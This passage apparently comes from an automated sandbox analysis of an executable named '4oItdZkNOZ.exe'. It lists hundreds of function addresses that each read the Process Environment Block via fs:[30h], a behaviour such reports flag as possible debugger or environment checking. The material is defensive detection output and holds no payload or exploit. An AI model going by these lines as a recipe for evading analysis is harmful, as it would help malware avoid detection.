          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B35210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BCC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BCC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BBA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BE3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BCFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BF1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]
